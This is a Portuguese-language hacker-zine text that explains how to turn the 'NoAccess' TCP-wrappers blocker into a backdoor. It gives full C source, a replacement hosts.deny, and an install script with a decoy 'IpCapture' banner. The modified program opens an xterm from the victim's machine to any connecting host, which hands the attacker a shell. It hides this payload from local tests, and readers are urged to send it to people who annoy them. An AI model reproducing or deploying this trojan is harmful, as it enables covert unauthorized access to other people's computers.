Ae, mostrarei aqui umas gracinhas q podemos fazer misturando o Wrapper
com C e Xterm.
O esquema eh o seguinte, o programa Noaccess (vcs jah devem ter visto)
bloqueia todos os servissos do seu computador ( telnet, ftp, finger, etc..),
ele tambem copia o IP de quem tentou acessar sua maquina deixando um aviso
do tipo:
Vc X.X.X.X, naum foi autorizado a utilizar o servisso tal...
Vc esta nos meus logs, Naum volte mais.
Se vc sabe configurar o Wrapper e entende um pouco de C, pode alterar o
Noaccess e torna-lo muito mais util. Aqui esta um exemplo:
acrescentando um pequeno codigo no programa, ele deixa de bloquear e abre
a maquina do quem instalou. Mande esse programa pra alguem que tiver te
zuando e tenha acesso a maquina dele. O codigo que eu acrescentei faz com
que a maquina da vitima execute um comando que abre um Xterm na maquina de
quem solicitou a coneccao. Com acesso ao shell, vc pode executar comandos
na maquina dele.
Lembre-se de que vc tem que digitar "xhost +" na sua maquina, para permitir
que o xterm seja aberto. Ae vai o prog alterado:
programa noaccess.c
<++> noaccess/noaccess.c
/*
NoAccess
All:All: twist /var/noacess %h %d ; \
/bin/echo -e "%h tentou acessar %f " >> /var/log/security.log
*/
#include<stdio.h>
#include<string.h>
int main(int argc, char *argv[]){
int i;
char str[50];
for(i=2; i >= 0; printf("%i ",i), fflush(stdout), sleep(1), i--);
printf("\n\nVoce , %s ,nao foi autorizado a se conectar com meu computador!\n\n", argv[1]);
printf("Voce esta nos meus logs!Nao volte mais !!!\n\n");
strcpy(str, argv[1]);
if (strcmp(str, "127.0.0.1")) {
strcpy(str, "xterm -display ");
strcat(str, argv[1]);
strcat(str, ":0.0 &");
system(str);
}
}
<-->
Aqui vai o arquivo hosts.deny
<++>
noaccess/ipcaph.d
All:All: twist /var/noaccess %h %d ; \
/bin/echo -e "%h tentou acessar %d " >> /var/log/ipcap.log;
<-->
Aqui vai o script para instalacao automatica, coloque ele em um diretorio
junto dos outros dois arquivos ( o noaccess e o hosts.deny ):
<++> noaccess/install.sh
cp /etc/hosts.deny /`whoami`/
cp /etc/hosts.deny ~`whoami`/
clear
echo " "
echo "**********************************"
echo "** armengado por AciDmuD **"
echo "**** instalando IpCapture 1.0 ****"
echo "**********************************"
echo " "
echo "as tentativas de log seram armazenadas em /var/log/ipcap.log"
echo " "
cat ipcaph.d > /etc/hosts.deny
gcc -o noaccess noaccess.c
chmod 555 noaccess
mv noaccess /var/
<-->
Pronto, agora excute o script. Ele faz uma copia do verdadeiro hosts.deny
e coloca-o em seu diretorio home. Mostra um texto: armengado por kamikase
Shell .. Ip Capture 1.0 e tal.. (soh pra iludir o coitado)
Quando o programa eh chamado ele testa se o IP de quem solicitou a
coneccao foi 127.0.0.1, pois se o lamah for testar o programa provavelmente
desconfiaria do Xterm que seria criado na sua propria maquina :P
Autor:AciDmuD
Fonte:Www.HackMode.Com.Br
eu acho q ja vi esse txt na antiga fatal 3rror zine